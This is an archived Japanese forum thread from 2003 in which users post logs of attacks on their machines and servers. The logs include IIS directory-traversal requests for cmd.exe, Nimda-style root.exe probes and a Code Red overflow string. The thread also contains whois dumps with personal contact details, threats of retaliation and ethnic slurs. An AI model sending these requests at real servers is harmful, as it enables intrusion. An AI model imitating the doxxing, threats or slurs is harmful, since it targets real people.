2003-01-13 08:42:38 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:41 80.130.182.226 HEAD /scripts/..%2f../winnt/system32/cmd.exe 500
2003-01-13 08:42:44 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:47 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:42:50 80.130.182.226 HEAD /scripts/..�ｯ../winnt/system32/cmd.exe 404
2003-01-13 08:42:53 80.130.182.226 HEAD /scripts/..��ｯ../winnt/system32/cmd.exe 404
2003-01-13 08:42:56 80.130.182.226 HEAD /scripts/..・���ｯ../winnt/system32/cmd.exe 404

2003-01-13 08:42:59 80.130.182.226 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
2003-01-13 08:43:02 80.130.182.226 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
2003-01-13 08:43:05 80.130.182.226 HEAD /scripts/..ﾁ..ﾁ..ﾁ..ﾁwinnt/system32/cmd.exe 500
2003-01-13 08:43:08 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:43:11 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:43:14 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:43:17 80.130.182.226 HEAD /scripts/winnt/system32/cmd.exe 404
2003-01-13 08:43:20 80.130.182.226 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500
2003-01-13 08:43:23 80.130.182.226 HEAD /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:43:26 80.130.182.226 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500

>>337-341 の続き
（省略２５６件）
2003-01-13 08:58:23 80.130.182.226 HEAD /..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
長いから省略ね。
いろんなパターン試してるよ。
こっちは、ちゃんとパッチあててるっつーの。

全部で３０６件。途中で気づいたからルータの設定切ったけど。
（ほっといてもよかったんだけど、やっぱうざいから）
このまま放置してたらどこまで続いたんだろう？

162.73.4.22

････かなりｳｼﾞｬｲ･･･
最近こいつばっか。

（＾＾）

130.54.248.158
く　せ　え

このスレは、アタッカーとワームの区別もつかんやつが集まってるようだね。
さすが２ｃｈ、厨房の集まりだな。

ここは隔離スレッドです

2003/01/16 07:02:00 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/16 07:02:00 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/16 21:02:57 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/16 21:03:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3055 ポート 3055 (TCP)
2003/01/16 21:04:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3062 ポート 3062 (TCP)
2003/01/16 21:23:50 210.80.197.158:80 aaa.bbb.ccc.ddd:3265 ポート 3265 (TCP)
2003/01/16 23:03:35 210.80.197.158:80 aaa.bbb.ccc.ddd:3467 ポート 3467 (TCP)
2003/01/16 23:05:50 210.80.197.158:80 aaa.bbb.ccc.ddd:3516 ポート 3516 (TCP)
2003/01/16 23:06:44 210.80.197.158:80 aaa.bbb.ccc.ddd:3574 ポート 3574 (TCP)
2003/01/16 23:09:07 210.80.197.158:80 aaa.bbb.ccc.ddd:3609 ポート 3609 (TCP)
2003/01/16 23:27:54 210.80.197.158:80 aaa.bbb.ccc.ddd:3658 ポート 3658 (TCP)
2003/01/17 20:40:09 210.80.197.158:80 aaa.bbb.ccc.ddd:1049 ポート 1049 (TCP)
2003/01/17 20:41:06 210.80.197.158:80 aaa.bbb.ccc.ddd:1067 ポート 1067 (TCP)
2003/01/17 23:42:34 210.80.197.158:80 aaa.bbb.ccc.ddd:3109 ポート 3109 (TCP)
2003/01/18 00:58:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3107 ポート 3107 (TCP)
2003/01/18 01:22:31 210.80.197.158:80 aaa.bbb.ccc.ddd:3307 ポート 3307 (TCP)
2003/01/18 17:48:50 210.80.197.158:80 aaa.bbb.ccc.ddd:4237 ポート 4237 (TCP)
2003/01/18 21:28:03 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/18 22:11:59 210.80.197.158:80 aaa.bbb.ccc.ddd:3138 ポート 3138 (TCP)

漏れのIPはaaa.bbb.ccc.dddに置き換えてある。
210.80.197.158は何者だろう？

>>349
そこに疑問を持つ前にSourcePortが80であることに疑問を持てよ。

860 ：名無しさん＠３周年 ：03/01/22 17:00
http://life.2ch.net/test/read.cgi/psy/1038396164/l50
>>855に同じく
俺のＩＰも出ていないが、いつ出して晒してくれるのですか　　藁

踏み台のIP晒してどうするの？

>>352
しっしーー、それを言っちゃダメだよ

211.123.229.140 こいつkansaiやねん。

61.180.94.131

あぼーん

211.135.255.206

Fri Jan 24 07:29:49/2003 SOCKS: Can't connect to server 207.46.104.20, port 1863

アタックＮｏ１

210.196.191.85から23にスキャン。

*.jsのアタッカー?

03/01/25 19:00:05 通信の要求 210.158.219.38 TCP(1887)

内容としては、侵入方法、防御方法、侵入された場合の対処方法
についてお話したいと考えてます。
---------------------------------------------------
　　　有限会社マギシステム
　　　片山　昌樹　 / Masaki Katayama
　　　Phone：03-5956-2926 / Net FAX : 020-4622-4260
E-Mail:[email protected]
http://www.magi.co.jp/
---------------------------------------------------

IP Address List HostName Aliases
63.187.169. 0 sdn-ap-017castocP2542.dialsprint.net

アタッカーて訳でもないが、他人のアドレスで勝手にメルマガ登録する
困ったさんです。スレ違い？スマソ・・・。

●登録日時: 2003/01/28 09:05:45
●登録時IPアドレス: 210.131.173.187

●登録日時: 2003/01/28 09:05:52
●登録時IPアドレス: 210.131.173.187

●登録日時: 2003/01/28 09:06:24
●登録時IPアドレス: 210.131.173.187


....登録IPが一緒なんだけど（笑）。
WhoISの結果とかって、晒していいもんなんでしょうか？

>>364
板違い。ネットワークセキュリティに関係ない。

２１日から133.100.9.2からPORT 123にしきりに来るんですが他に来てる人居ません？
当方フレッツISDNで３分で切れるようにしてるんでしょっちゅうIP変わるんですが
しつこく来るんですよね。
それともLAN内のPCがウイルスにやられてるのかなぁ。

>>366
今日ポート12345に来ますた

へへへ　いただき！！！
1000ｹﾞﾄ

218.222.180.235
ポート６６９９に来た

ＭＸつけっぱで外出してかえってくるとたまにｱﾀｯｸされてるが

>>369

>ポート６６９９に来た
だからそれ、MXじゃないの？

>>364
ﾊｱ？

03/01/28 14:12:54 ICMP Traffic n/a 24-193-45-49.nyc.rr.com Echo Reply/0 送信 LocalHost ICMP Echo Reply/0 00:00:00
03/01/28 14:12:54 ICMP Traffic n/a 24-193-45-49.nyc.rr.com Echo Request/0 受信 LocalHost ICMP Echo Request/0 00:00:00

>>371
364が発行してるメルマガに他人のアドレスで勝手に登録してくる奴のIPだろ。

こんなパケットがきました。で、このサイトIP逆引きできないし、
匿名FTP外部に公開してるし(カレントディレクトリ設定してないから
入れないようだけど)なんか、踏台っぽいな。

ちなみにWho isすると...まぁ興味のあるひとがやってみればいいか。

210.150.186.180:13611 -> aaa.bbb.ccc.ddd:57875 INVALIDACK *2*A*RS* RESERVEDBITS
210.150.186.180:0 -> aaa.bbb.ccc.ddd:0 NULL ********
210.150.186.180:57992 -> aaa.bbb.ccc.ddd:53824 VECNA 12**P*** RESERVEDBITS
210.150.186.180:53830 -> aaa.bbb.ccc.ddd:26148 UNKNOWN 1****R** RESERVEDBITS

>>374
パケット壊れてるぽ。つーか、お前と同じFW使って無くてもわかるように16進ダンプにしろよ。

>>374
InfoSphere (株式会社NTTPCコミュニケーションズ) の配下にあって………
ぶわははははは　激しくﾜﾛﾀ　（ｗ

興味がある人はWebサイト見てみるべし！（藁

ちなみにwhoisで出てきたコレって、以前「彼氏募集中」なSPAM送ってきたﾔｼが
名乗ってた名前だったような気が……

# そろそろスレ違い気味なんでsage

>>375
パケットのヘッダを詐称(Spoofing)しているんだとおもわれ。
Snortでログとっていただけだから16進ダンプはなくてね...スマソ

219.107.149.185

こいつトロイばっか送りつけてきやがる
うざすぎ

2003/01/29 19:59:18Rst attack68.164.118.85 -> 68.164.118.85
2003/01/29 20:59:20Rst attack68.164.118.85 -> 68.164.118.85
2003/01/29 23:59:27Rst attack68.164.118.85 -> 68.164.118.85

「ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました」というメッセージをトロイ送ってきていると勘違いしている
馬鹿はとっとと死んでくれ。

29/01/2003 22:06:12.467584 pppoe0 @100:13 b 195.117.126.24,26464 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:13.463107 pppoe0 @100:13 b 195.117.126.24,30953 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:14.318802 pppoe0 @100:13 b 195.117.126.24,15872 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:15.272010 pppoe0 @100:13 b 195.117.126.24,43083 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:16.206179 pppoe0 @100:13 b 195.117.126.24,38675 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:17.139994 pppoe0 @100:13 b 195.117.126.24,22840 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN

このスレは、whoisの結果を貼りつけると
どこにいるかもしれない相手がビビると思ってたり
自分の「ふぁいあーうぉーる」でブロックされたIPアドレスを公開すると
世の中が良くなると信じている人たちの隔離場所です。

>>382
質問は適当な質問スレへどうぞ。

いいえ、単なる自己満足スレッドです。

U170194.ppp.dion.ne.jp 死国の猿
p1125-ip01oomichi.oita.ocn.ne.jp 　大分在住の元死国の猿

80.136.106.76
Fuck

ＩＰ　219.165.249.80 ホスト　n249080.ap.plala.or.jp　固定ＩＰっぽいですｗ
アフォですなｗ

固定じゃなかったｗ(爆)

202.229.198.199
210.81.226.212
211.239.163.19
202.168.201.129
逝ってよし。

218.5.3.150
うぜえ

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

Cykhm17DS20.kng.mesh.ad.jp

210.136.232.249
210.138.60.216

f-ibaraki-193232.zero.ad.jp

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

81.2.168.51
デンマークの電波な香具師のIP
マジ困ってる、こいつヤバイ、超ヤバイ

どれ位ヤバイかっていうと、ヤらせろってメールきたんよ
俺は男だってかえしたら
俺も男だってきたんよ



や　ら　な　い　か　？
なのか？
とりあえずPING爆弾でも送っとくか…

http://homepage.mac.com/norika27/

http://kame.kakiko.com/hiroyuki/hankaku_b01.html

>>398
やらしてやるからすぐに来いといってやれ。

211.194.69.250
koreaから来た。ｸｿｯﾀﾚ

68.69.35.32
最近毎日だよ・・・・

68.55.251.155

なんか不審なきがする。だれか調査してくれ。

218.145.25.49 - - [21/Apr/2003:14:21:43 +0900] "GET /robots.txt HTTP/1.0" 200 391 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET / HTTP/1.0" 200 13502 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/bnlcortisiciliani/corti.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/cinemadalmondo/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/convegno/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/diamondaward/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/english/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/grandecinema/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/leone/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/marilynforever/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"

218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/morrissey/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/mostre/mostre.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/nastridargento/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/programma/programma.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/pubblicazioni/pubblicazioni.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/rassegna_stampa/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/servizi/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/showcase.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/sponsor/sponsor.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/ticketone.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"

等、58行に渡る。

他人のHPに管理人のフリをして悪質ﾚｽをしまくる。
6月13日(金)02時50分11秒
Remote Host: 61-205-102-8.eonet.ne.jp
大阪の基地害女には何を送るべき？

24.186.119.129

トロイ送りつけてきやがった。アメリカ人は氏ねよ。

hmmt127163.catv.ppp.infoweb.ne.jp

板TOPより転載

この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

http://homepage.mac.com/hiroyuki44/

このスレの人は、

踏み台やバウンダーやパラサイトの類の可能性を信じない人たちですか？

厨房隔離スレですから…

61.26.183.111
最近サイトに荒らしが来るのだが、このIPをサーチすると
国がAUになる。
オーストラリア等の串で荒らしてるということですか？？

うん、そうだよ。

68.42.30.212 - - [18/Jun/2003:17:14:35 +0900] "POST http://210.***.***.***:25/ HTTP/1.1" 403 307
210.240.71.131 - - [18/Jun/2003:17:15:35 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
うぜぇ

p6237-ip02souka.saitama.ocn.ne.jp

FLA2Abj190.osk.mesh.ad.jp
虎戦士　

64.71.177.66 biwa38.he.net
OrgName Hurricane Electric
OrgID HURC
Address 3433 Rockett Drive
City Fremont StateProv CA Postalcode 94538 Country US

カリフォルニア　Sunnyvale だってさ。
１１回もありがとうございました。

すみません　まねして自分の所に来たやつを載せてみたんだけど
意味あるのかな？
お役にたてますか？これでなんか分かるんですか？初心者なんで怒らないでください。

なにを11回なんだ？それによるだろ？

>>417
それってアッタクなんですか？

>417さんの　はじめ　〇にみえたがそれって　×だよねえー
　
＞４２２さん　初心者なんでよくわかんないんだよ。
　ルーター通り越してＦＷまできたんだよ。
　危険度　高　　だって。。

ここなっつにかもん！
http://homepage3.nifty.com/coco-nut/

>>電話屋さん
やはり、良く分からん。。。
ルータを通ってFWにアクセスが11回あったってこと？
ルータのルーティング設定によってちゃあ、普通に通すこともあり得る。
でもFWでちゃんとハジいてんでしょ？だったら大丈夫だろ。
心配だったらルータの設定見なおしてみれば。
鯖立てて、ポートフォワードしてたりしない？

>>423
ある意味アタックだが、ありふれすぎてて話題にもしたくない内容だ。
しかも古い・・・

久しぶりにマジレス(藁

>>421
こんな糞スレで質問せずに質問スレでやればいいのに…

セキュリティ初心者質問スレッドpart25
http://pc.2ch.net/test/read.cgi/sec/1054458698/l50

このスレは隔離スレなので質問は質問スレッドでどうぞ。

セキュリティ初心者質問スレッドpart25
http://pc.2ch.net/test/read.cgi/sec/1054458698/l50

ネットワークの基本が分からない方は、
初級ネットワーク板http://pc.2ch.net/hack/を
ROMることをお勧めします。

64.71.177.66
HTTP_IIS_ISAPI_Extension攻撃（藁

156.34.179.38 - - [19/Jun/2003:00:57:58 +0900] "OPTIONS / HTTP/1.1" 403 290 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"

画面がすくろーるしちまったよ。30回ぐらいアクセスしてきた。

もっとスゴイアッタク教えて下さい。

345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前： エロ本屋 投稿日： 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp

消えろODN基地外ユーザー

おまいら踏み台のIP晒して楽しいか？

24.95.232.113

IP晒すんなら踏み台遡って攻撃元まで晒せ。

>435
どーやんの？　
　
＞＞429　　同じＩＰだねえ。。。

アフォは消えろ
糞スレあげんな

よくわからないねえ。。。

何を主張したいの？

＞何を主張したいの？
糞スレあげんな

初級ネットワーク板 http://pc.2ch.net/hack/

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

210.153.146.238

４３８　は　私のふりして　書き込んだな。。。
＞４４１　今回は　sage　で書き込みしました。

FM-4735B71DD3F7
172.17.17.4
202.148.142.14

埋め立て

64.216.218.54

218.123.72.69
まったく

>>447
バカは氏ね

おまいら踏み台のIP晒して楽しいか？

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

219.104.204.80
oyma.102080.catv.ppp.infoweb.ne.jp
真性ですな

ノートンさんのファイアウォールでひっかかったやつだが、報告はこれでいいか？
http://www.networksolutions.com/cgi-bin/whois/whois?STRING=comcast.net&SearchType=do

68.33.231.92
pcp03599043pcs.whtmrs01.md.comcast.net

CustName: Comcast Cable Communications, Inc.
Address: 3 Executive Campus
Address: 5th Floor
City: Cherry Hill
StateProv: NJ
PostalCode: 08002
Country: US
RegDate: 2003-03-19
Updated: 2003-03-19

IPからどうやって地域を特定するのでしょうか？
最近、しかも早朝に攻撃されてむかついています

>>451-453
氏ね

>>454
お前がな

ここに晒すこと自体意味あるのかね？
代わりに仕返ししてくれるとかじゃないだろ

某掲示板のスレでありもしないコトでたたかれました。
おかげで信用はなくすし･･･、掲示板のカキコからIPをぬくコトはできなぃのでしょうか？
どぅしても、カキコした人を捕まえたいんです。
情報ください。お願いします。

あぼーん

>>458
http://www.infoseek.livedoor.com/~himajin_ch/reloader.htm?timer=500&count=true&url=http://yahooo.s2.x-beat.com/linkvp/linkvp.html

ぇっと･･･、繭は風俗情報を知りたぃわけじゃなぃんですが。

ノートンで・・・・
ＫＯＫＵＳＡＩ　ＫＯＵＧＹＯＵ　ＫＡＮＤＡ　ＢＬＤＧ　６Ｆ

>>457
氏ね

？

hompy.comってなんだ？
個人情報を取ってる感じ。
マカフィーが反応しています。

みなさんも、気をつけて！

>>464
師ね

あぼーん

(・∀・)コレイイ
http://members.goo.ne.jp/home/assassin502/
>>466厨房キターｗ

http://www.k-514.com/
ボッキンキン

>>460
エロチカギャル尾めっv(^_-)ミ★

2003/07/03 22:10:24, HTTP port probe, 220.73.165.11, 53
こいつウザイ今アタックしまくってる、もう70回超えてる、たのむからちゃんとしろよボケ

昨日に引き続き
お隣、韓国ソウルからのアタック

inetnum: 218.237.232.0 - 218.237.232.255
netname: HANANET-CATV-ANYANGSO-KR
descr:　　 HANARO Telecom
descr:　　 1445-3 Seocho-Dong Seocho-Ku
descr:　　 SEOUL
descr:　　 137-728
country:　KR

>>470-471
師ね

>>472
あなたは見知らぬ闇討ちされた事されたありますか？
驚きませんか探知されてるのですよ
それを進とはなんですね

>>473
能書きはいいから、死ね。

はぁ？
人間的心をもっていない２ｃｈに頼りきりの弱小脆弱日本人がないいってんですか

おこっちゃまし！
し！

ふー！

２ｃｈはCoReAに統合されます
感謝してください

あ￥ｓ　

?夬????, ?

>>475日本人がないいってんですか
「ないいってんですか 」はチョソ同士では通じるかも知れませんが、
日本語を練習してから書き込んで下さい。

ここの厨房にむかついてます。

http://island.gaiax.com/home/tuyosi/main

アホか？ってな感じです。

＞４８１
それはあなただーo(-_^)v（ぷっ

>>482
凄いアホをみてしまった。素で焦った。
こんなあほな中学生がいたとは・・・・

あぼーん

>>485
師ね　

220.104.110.164
p8164-ipad29hodogaya.kanagawa.ocn.ne.jp

（ ´_ゝ｀）ﾌｰﾝ
日本の植民地だった国の人が、しゃしゃり出て来るスレはココですか。
そんなに、日本人とお話したかったら、おとなしく併合されとけば良かったのにね〜。

>>487
死ね

IIS4 で自鯖してるんだけど、NETSTATで見ていたら
TCP 192.168.1.8:1794 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1795 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1842 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1843 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1845 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1846 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1847 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1849 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1850 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1855 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1856 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1859 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1861 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1864 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1865 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1866 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1870 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1873 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1876 207.46.82.78:80 TIME_WAIT

こんなのが見えるんだけれど　？

>>490
師ね

>>491
調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら

ｸｽｸｽ

本物のトリップを出してからどうぞ。

219.106.13.77
新潟三洋電子
踏み台なのか？そうなのか？どうなんだYO!

>>495
死ね

ここいつも攻撃して来るんだけど。
Yahooの職員がハッキングしてるって噂がある。
inetname: 2190.0.0.-219.63.255.255
netname:BBTECH
descr:SOFTBANK BB CORP
descr:Nation wide network in Japan
country:JP
admin-c:SA127-AP
tech-c:SA12-AP
mnt-by:APNIC-HM
mnt-lower:MAINT-JP-BBTECH
changed: [email protected] 20011031
changed:[email protected] 20030616
status: ALLCATED PORTABLE
source:APNIC

>>497
もういいって
寝ていいよ

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

inetnum: 219.138.0.0 - 219.140.255.255
netname: CHINANET-HB
descr: CHINANET hubei province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CHA1-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-HB
changed: [email protected] 20020521
status: ALLOCATED NON-PORTABLE
source: APNIC

中国人はっかー？？

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

% [whois.apnic.net node-1]
% How to use this server http://www.apnic.net/db/
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 210.13.0.0 - 210.13.31.255
netname: JITONG-CN
descr: Ji Tong Communications Co.,Ltd, Beijing Branch
country: CN
admin-c: QZ30-AP
tech-c: QZ30-AP
mnt-by: MAINT-CHINAGBN-AP
changed: [email protected] 20010626
status: ALLOCATED PORTABLE
source: APNIC

person: Qing Zhourong
address: Room 201,Buiding 4,No.27 Wanshou Road, Beijing
address: BEIJING, CHINA
country: CN
phone: +86-010-64262954
fax-no: +86-010-64251441
e-mail: [email protected]
nic-hdl: QZ30-AP
mnt-by: MAINT-CHINAGBN-AP
changed: [email protected] 20010626
source: APNIC

>501
>IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
>踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方

うざい、何回も同じ事繰り返し書くな
前向きに話を進めたいなら、判別の仕方教えれ

じゃなきゃ、おまえ自身が荒らしと変わらんぞ

http://groups.msn.com/revo11esgnjpohcfqbq8bp2qc3/homepage

>>503
＞IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします

>>502
死ね

>>500
師ね　

アメリカの色んな出合い系に出没する有名なアメリカ人がいるらしいんだけど
どうも英語が下手で、アメリカ人では気がするんだよ。
試しにメール書いてみたら、ＩＰがアメリカなんだが
別なサイトでそいつに遭遇した時は、イタリアになってたりドイツになってたり
するんだよ。どういうことだ？

訂正　アメリカ人では無い気がするんだよ

http://homepage.mac.com/hiroyuki44/hankaku09.html

2003/07/08(22:17:26) W-SV 218.75.150.179 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:17:27) W-SV 218.75.150.179 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:17:28) W-SV 218.75.150.179 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
